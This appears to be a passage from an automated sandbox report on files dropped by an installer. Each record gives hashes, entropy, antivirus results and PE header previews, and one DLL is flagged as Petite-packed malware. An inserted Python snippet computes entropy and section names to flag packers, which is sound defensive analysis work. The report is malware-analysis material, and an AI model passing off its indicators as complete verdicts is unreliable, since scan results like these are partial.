                                                                                          Category:dropped
                                                                                          Size (bytes):68042
                                                                                          Entropy (8bit):6.090396152400884
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:RX3HAdi7wgCsL6dVSngk2IFm3ZJVRDBLRROBBKRzPm3YRiF+ixh:NHQpe6SnZQLjICPm3Ytib
                                                                                          MD5:5DDA5D34AC6AA5691031FD4241538C82
                                                                                          SHA1:22788C2EBE5D50FF36345EA0CB16035FABAB8A6C
                                                                                          SHA-256:DE1A9DD251E29718176F675455592BC1904086B9235A89E6263A3085DDDCBB63
                                                                                          SHA-512:08385DE11A0943A6F05AC3F8F1E309E1799D28EA50BF1CA6CEB01E128C0CD7518A64E55E8B56A4B8EF9DB3ECD2DE33D39779DCA1FBF21DE735E489A09159A1FD
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...&...........................d......................................@... ..............................0..t....`..P....................p.......................................................1..H............................text...d...........................`..`.data...L...........................@....rdata..\...........................@..@/4.......2.......4..................@..@.bss.....................................edata..............................@..@.idata..t....0......................@....CRT....0....@......................@....tls.........P......................@....rsrc...P....`......................@....reloc.......p......................@..B........................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):17472
                                                                                          Entropy (8bit):7.524548435291935
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:IwwsQD13cT5HhSVeEQNW5kbbcGEh/qTio+lyTnGy:QRD13ySVeEOW5kbSSTHNTnr
                                                                                          MD5:7B52BE6D702AA590DB57A0E135F81C45
                                                                                          SHA1:518FB84C77E547DD73C335D2090A35537111F837
                                                                                          SHA-256:9B5A8B323D2D1209A5696EAF521669886F028CE1ECDBB49D1610C09A22746330
                                                                                          SHA-512:79C1959A689BDC29B63CA771F7E1AB6FF960552CADF0644A7C25C31775FE3458884821A0130B1BAB425C3B41F1C680D4776DD5311CE3939775A39143C873A6FE
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...................................D.... ..PE..L....^.L...........!....%v..%.......6........`......................................................................h..................@....................F...............................................................................................p.......8..................`....rsrc...........@....B..............@..@....................................@...........%...........................`.......................................X...x..0....j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.,..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..D..%...........|...CC.......p......n....<.......`..............lH......)...............
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):772608
                                                                                          Entropy (8bit):6.546391052615969
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
                                                                                          MD5:B3B487FC3832B607A853211E8AC42CAD
                                                                                          SHA1:06E32C28103D33DAD53BE06C894203F8808D38C1
                                                                                          SHA-256:30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
                                                                                          SHA-512:FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):197120
                                                                                          Entropy (8bit):6.423554884287906
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
                                                                                          MD5:67247C0ACA089BDE943F802BFBA8752C
                                                                                          SHA1:508DA6E0CF31A245D27772C70FFA9A2AE54930A3
                                                                                          SHA-256:BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
                                                                                          SHA-512:C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d,.. M.. M.. M..4&..-M..4&...M..4&..3M..r8...M..r8../M..r8..1M..4&..#M.. M.._M..v8..$M..v8..!M..v8..!M..v8..!M..Rich M..........PE..L... ..a...........!.........................................................@............@.........................@...p.......(............................ ..(...P...8...............................@...............H............................text...>........................... ..`.rdata..d...........................@..@.data...H...........................@....rsrc...............................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):19008
                                                                                          Entropy (8bit):7.672481244971812
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:dz7otnjFa4ECX3yeGjA+tSXGnUav92hca+XWRlsuG+is:po7GU+szS3W7sQ7
                                                                                          MD5:8EE91149989D50DFCF9DAD00DF87C9B0
                                                                                          SHA1:E5581E6C1334A78E493539F8EA1CE585C9FFAF89
                                                                                          SHA-256:3030E22F4A854E11A8AA2128991E4867CA1DF33BC7B9AFF76A5E6DEEF56927F6
                                                                                          SHA-512:FA04E8524DA444DD91E4BD682CC9ADEE445259E0C6190A7DEF82B8C4478A78AAA8049337079AD01F7984DBA28316D72445A0F0D876F268A062AD9B8FF2A6E58D
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...................................D.... ..PE..L....+vS...........!....6...6.......6........p......................................................................0..........P.......@...................tM.......................................................................................................>..................`....rsrc...........@....H..............@..@....................................@...........6...........................`.......................................D...n'......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.5..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X............f.......Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..K..........(...|...}K...................E..K....p..j...g........Q..........y...........
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):227328
                                                                                          Entropy (8bit):6.641153481093122
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
                                                                                          MD5:BC824DC1D1417DE0A0E47A30A51428FD
                                                                                          SHA1:C909C48C625488508026C57D1ED75A4AE6A7F9DB
                                                                                          SHA-256:A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
                                                                                          SHA-512:566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e>.a...........#.........t...V.................e.........................@......1......... .........................#....................................0...............................).......................................................text...............................`.P`.data...............................@.`..rdata..d0.......2..................@.`@.eh_framd@...@...B..................@.0@.bss.....T............................`..edata..#............T..............@.0@.idata...............^..............@.0..CRT....,............d..............@.0..tls......... .......f..............@.0..reloc.......0.......h..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):26126
                                                                                          Entropy (8bit):6.048294343792499
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
                                                                                          MD5:D1223F86EDF0D5A2D32F1E2AAAF8AE3F
                                                                                          SHA1:C286CA29826A138F3E01A3D654B2F15E21DBE445
                                                                                          SHA-256:E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
                                                                                          SHA-512:7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........f.........#.....6...b...............P.....h................................8-........ .........................i...................................................................Lk......................................................text....4.......6..................`.P`.data...,....P.......:..............@.0..rdata.......`.......<..............@.`@/4......T....p.......J..............@.0@.bss..................................`..edata..i............V..............@.0@.idata...............X..............@.0..CRT....,............^..............@.0..tls.................`..............@.0..reloc...............b..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):16910
                                                                                          Entropy (8bit):5.289608933932413
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
                                                                                          MD5:2F040608E68E679DD42B7D8D3FCA563E
                                                                                          SHA1:4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
                                                                                          SHA-256:6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
                                                                                          SHA-512:718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........B.........#.........>...f...........0.....h......................... ................ .........................{.......|...............................$...........................pA.......................................................text...4...........................`.P`.data...<....0......."..............@.0..rdata.......@.......$..............@.`@/4...........P.......(..............@.0@.bss.....d...`........................`..edata..{............2..............@.0@.idata..|............4..............@.0..CRT....,............:..............@.0..tls.................<..............@.0..reloc..$............>..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):149845
                                                                                          Entropy (8bit):7.893881970959476
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:y0z4JQHu5EvSA/JqiK2s6g+hUCQiMVQ623hi3JKz8KQP6ZwhQrNrbZ:yUju5GY7l+CCYVQ62YUzXQiqhQrJbZ
                                                                                          MD5:526E02E9EB8953655EB293D8BAC59C8F
                                                                                          SHA1:7CA6025602681EF6EFDEE21CD11165A4A70AA6FE
                                                                                          SHA-256:E2175E48A93B2A7FA25ACC6879F3676E04A0C11BB8CDFD8D305E35FD9B5BBBB4
                                                                                          SHA-512:053EB66D17E5652A12D5F7FAF03F02F35D1E18146EE38308E39838647F91517F8A9DC0B7A7748225F2F48B8F0347B0A33215D7983E85FCA55EF8679564471F0B
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-82P0C.tmp, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                          Preview:MZ......................@...................................D.... ..PE..L....r.[...........!....U....D............... ............................... ............@.........................P...........d............................N..........................................................8............................................@..................@..@.rsrc................B..............@..@.......................................@petite..U.......U....F..............`..`.....................................5....`K...=1.;;..s}....3500.z.<..]goR.lVO..C..j...........O......9#f.S.$1.b.D.8...VX....sb .A.%I......B.........R...Z5.............y......_W.0.!..T..nT.V..J..s.1`..V...Cb.2x0......0B...4...D.`...!.>[7..^;w'.u"W/...).P.m...P.......qF<.~1..T.>F.F.Rr.`...N....3$...w.L..P..SQP]C^.....2...%5.v...3.a`.k....q.0.o..A......k.....B..P.h.fy..jyb...<t$.%c-...<9.1#2.7./0.j.o#~...,!fuJ.M..a...(...0@.........,..t.3d"qva....fm.=.....]....s...z}-X..3................y>.!......g..E
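The record above is the only file in this batch the report marks Malicious:true (Yara: Petite Virus). Two cheap indicators in that record point the same way before any signature fires: the 8-bit entropy of 7.89, and a section literally named `petite` visible in the preview next to the report's "PE file has nameless sections" signature. As an added example (not Joe Sandbox code, nor code from any of the dropped files), the following Python recomputes both indicators from raw bytes: Shannon entropy on the report's "Entropy (8bit)" scale, and section names from a minimal PE header walk. The `build_sample_pe` helper, its constructed payloads, and the 7.5 entropy threshold are illustrative assumptions; no real dropped file is embedded.

```python
"""Added example: recompute a Joe Sandbox report's per-file packer indicators.
Not Joe Sandbox code and not code from the analysed sample."""
from __future__ import annotations

import hashlib
import math
import struct
from collections import Counter


def entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0), the scale of the report's
    'Entropy (8bit)' field. Values near 8 mean compressed, encrypted or packed
    content; plain code and text usually sit well below 7."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_section_names(data: bytes) -> list[str]:
    """Minimal PE header walk that returns the 8-byte section names.
    Raises ValueError on missing or truncated MZ/PE headers. Names beginning
    with '/' (as in the '/4', '/19' previews above) are offsets into the COFF
    string table, which this parser does not resolve."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0" or len(data) < e_lfanew + 24:
        raise ValueError("no PE signature")
    # IMAGE_FILE_HEADER: Machine(2) NumberOfSections(2) TimeDateStamp(4)
    # PointerToSymbolTable(4) NumberOfSymbols(4) SizeOfOptionalHeader(2) Characteristics(2)
    num_sections, size_opt = struct.unpack_from("<xxH12xH2x", data, e_lfanew + 4)
    sec_table = e_lfanew + 4 + 20 + size_opt
    names = []
    for i in range(num_sections):
        raw = data[sec_table + i * 40: sec_table + i * 40 + 8]
        if len(raw) < 8:
            raise ValueError("section table truncated")
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return names


def packer_indicators(data: bytes, entropy_threshold: float = 7.5) -> dict:
    """The indicators the report surfaces for the Petite-packed DLL: a section
    named 'petite', nameless sections, and high whole-file entropy. The 7.5
    threshold is an assumption for illustration, not a Joe Sandbox constant."""
    names = pe_section_names(data)
    ent = entropy_8bit(data)
    return {
        "entropy": round(ent, 3),
        "high_entropy": ent >= entropy_threshold,
        "petite_section": any(n.lower() == "petite" for n in names),
        "nameless_sections": sum(1 for n in names if n == ""),
        "sections": names,
        "sha256": hashlib.sha256(data).hexdigest().upper(),
    }


def build_sample_pe(section_names: list[str], payload: bytes) -> bytes:
    """Constructed test data: a minimal, non-runnable PE32 DLL image with the
    given section names and payload. Only the fields the parser reads are set."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)           # e_lfanew -> PE header
    opt = bytes(224)                                   # PE32 optional header (0xE0), unused
    # i386, N sections, no symbol table, SizeOfOptionalHeader, Characteristics DLL|EXECUTABLE
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, len(opt), 0x2102)
    sections = b"".join(n.encode("ascii").ljust(8, b"\0") + bytes(32) for n in section_names)
    return bytes(dos) + b"PE\0\0" + file_hdr + opt + sections + payload


if __name__ == "__main__":
    # Constructed: two nameless sections plus a 'petite' section over a
    # uniformly distributed payload, mimicking the flagged record's shape.
    packed = build_sample_pe(["", "", ".rsrc", "petite"], bytes(range(256)) * 16)
    plain = build_sample_pe([".text", ".rdata", ".data"], b"A" * 4096)
    for label, blob in (("packed", packed), ("plain", plain)):
        print(label, packer_indicators(blob))
```

Run it against a real dropped file by replacing the constructed blobs with `open(path, "rb").read()`; the `sha256` field should then match the report's SHA-256 line for that file, which is the check that you are looking at the same artifact the sandbox hashed.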
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:Unicode text, UTF-8 text
                                                                                          Category:dropped
                                                                                          Size (bytes):1059
                                                                                          Entropy (8bit):5.1208137218866945
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
                                                                                          MD5:B7EDCC6CB01ACE25EBD2555CF15473DC
                                                                                          SHA1:2627FF03833F74ED51A7F43C55D30B249B6A0707
                                                                                          SHA-256:D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
                                                                                          SHA-512:962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
                                                                                          Malicious:false
                                                                                          Preview:Copyright (c) 2011 Jan Kokemüller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):294926
                                                                                          Entropy (8bit):6.191604766067493
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
                                                                                          MD5:C76C9AE552E4CE69E3EB9EC380BC0A42
                                                                                          SHA1:EFFEC2973C3D678441AF76CFAA55E781271BD1FB
                                                                                          SHA-256:574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
                                                                                          SHA-512:7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.........|.....................n.................................c........ ......................`..j7...........................................................................................................................text...8...........................`.P`.data...x...........................@.0..rdata...F.......H..................@.`@/4.......U.......V..................@.0@.bss.........P........................`..edata..j7...`...8...$..............@.0@.idata...............\..............@.0..CRT....,............b..............@.0..tls.................d..............@.0..reloc...............f..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):22542
                                                                                          Entropy (8bit):5.5875455203930615
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
                                                                                          MD5:E1C0147422B8C4DB4FC4C1AD6DD1B6EE
                                                                                          SHA1:4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
                                                                                          SHA-256:124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
                                                                                          SHA-512:A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X...............,...T...............@....@.......................................... .................................@...........................................................PU..........................P............................text....+.......,..................`.P`.data........@.......0..............@.`..rdata..0....P.......2..............@.0@/4...........`.......<..............@.0@.bss.........p........................`..idata..@............J..............@.0..CRT....4............T..............@.0..tls.................V..............@.0.................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):126478
                                                                                          Entropy (8bit):6.268811819718352
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
                                                                                          MD5:6E93C9C8AADA15890073E74ED8D400C9
                                                                                          SHA1:94757DBD181346C7933694EA7D217B2B7977CC5F
                                                                                          SHA-256:B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
                                                                                          SHA-512:A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....m.........................p......f......... .........................{.... ...............................P..............................X........................!...............................text....\.......^..................`.P`.data........p.......b..............@.`..rdata..h&.......(...d..............@.`@/4......\B.......D..................@.0@.bss..................................`..edata..{...........................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):852754
                                                                                          Entropy (8bit):6.503318968423685
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:fpFFQV+FKJ37Dm+yY4pBkPr2v2meLaoHN/oBrZ3ixdnGVzpJXm/iN:fpnzFw37iDYIBkzuPcHNgrZ3uGVzm/iN
                                                                                          MD5:07FB6D31F37FB1B4164BEF301306C288
                                                                                          SHA1:4CB41AF6D63A07324EF6B18B1A1F43CE94E25626
                                                                                          SHA-256:06DDF0A370AF00D994824605A8E1307BA138F89B2D864539F0D19E8804EDAC02
                                                                                          SHA-512:CAB4A7C5805B80851ABA5F2C9B001FABC1416F6648D891F49EACC81FE79287C5BAA01306A42298DA722750B812A4EA85388FFAE9200DCF656DD1D5B5B9323353
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..Y.,..v......!......... .....................a................................O}........ ......................................@.......................P..X0...........................0.......................................................text...............................`.P`.data...............................@.`..rdata..............................@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,.... ......................@.0..tls.... ....0......................@.0..rsrc........@......................@.0..reloc..X0...P...2..................@.0B/4...................&..............@.@B/19.................*..............@..B/31..........@......................@..B/45..........`......................@..B/57.................................@.0B/70.....i...............
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):39304
                                                                                          Entropy (8bit):7.819409739152795
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:i5GGx+OZPWuGdoiwUpPLH7IN3x1eW0kIAJbfT13MMnahRlmftuohQf:i5DxDPWMApPLsNhkVkI6R3TnalauoQ
                                                                                          MD5:C7A50ACE28DDE05B897E000FA398BBCE
                                                                                          SHA1:33DA507B06614F890D8C8239E71D3D1372E61DAA
                                                                                          SHA-256:F02979610F9BE2F267AA3260BB3DF0F79EEEB6F491A77EBBE719A44814602BCC
                                                                                          SHA-512:4CD7F851C7778C99AFED492A040597356F1596BD81548C803C45565975CA6F075D61BC497FCE68C6B4FEDC1D0B5FD0D84FEAA187DC5E149F4E8E44492D999358
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."b...........!.........x.......P.......................................`.......Z....@.........................PR.......Q..d....0..0............}......D........................................................Q..8.................................... .......t..................@..@.rsrc.... ...0.......v..............@..@petite.......P.......z..............`..`......................p..k..K..i{..\.H..'.|w.t...\..dkB%..i.cX...`*B...m.X..A.NU.i.I. J.I....x-.e2n.IA.2.:..2G5Z/.+(8w.S<...`ML........!..%+.r.s.1.~.D...]......U..q3.....9..?y.>j.E.T...Y..D..>..aJ......P^Y..w?.9w.,...+C^.[....|..'.....7..F%..A.....)..b.)8.2Q`.v.F=.."S*..{z...z-H=....L_....RM..s......H2P1a....[..i. 2..~.?...+R... .m(.I..X...H.g.Z..i..G.?.(......e.:.B......fh......gl.x.Z......I>..#....Hgv.;g.@ l.$(...0.........l.>.p..z;A.@...*4v..x.U.gU..Bqqb..6.x...D.....cIE(5m.g}J..
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):845312
                                                                                          Entropy (8bit):6.581151900686739
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:PgQ5Lxf4qcB5SdtFJPAYiXbJ1luVw6DbhJLJbCKShfCtk/8ou/UvfK7hs4I:H5Ng9zK5Puq7hsN
                                                                                          MD5:00C672988C2B0A2CB818F4D382C1BE5D
                                                                                          SHA1:57121C4852B36746146B10B5B97B5A76628F385F
                                                                                          SHA-256:4E9F3E74E984B1C6E4696717AE36396E7504466419D8E4323AF3A89DE2E2B784
                                                                                          SHA-512:C36CAE5057A4D904EBDB5495E086B8429E99116ACBE7D0F09FB66491F57A7FC44232448208044597316A53C7163E18C2F93336B37B302204C8AF6C8F1A9C8353
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):36416
                                                                                          Entropy (8bit):7.842278356440954
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:lshkyPXvH6bPACtmb8boNQdVfCXewki/OvXEApOqmFfSq1oIQMW:lsh3n5Pb8boOdVCuwNEXEAonfSq1JQb
